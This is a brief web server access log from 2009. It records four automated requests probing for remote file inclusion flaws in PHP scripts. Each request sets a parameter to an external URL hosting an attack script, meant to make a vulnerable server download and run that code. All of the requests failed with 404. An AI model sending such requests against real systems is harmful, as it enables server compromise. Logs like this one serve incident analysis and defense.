63.247.129.200 - - [30/Jan/2009:12:18:15 -0800] "GET /logs/access_080605.log//class/class.admin_menu_lms.php?where_framework=http://www.cybernewspr.com/cache/idomila.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.129.200 - - [30/Jan/2009:12:18:15 -0800] "GET /class/class.admin_menu_lms.php?where_framework=http://www.cybernewspr.com/cache/idomila.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.129.200 - - [30/Jan/2009:12:18:16 -0800] "GET /logs//class/class.admin_menu_lms.php?where_framework=http://www.cybernewspr.com/cache/idomila.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.102.239 - - [30/Jan/2009:12:18:21 -0800] "GET /logs/access_080411.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.agarwalcards.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
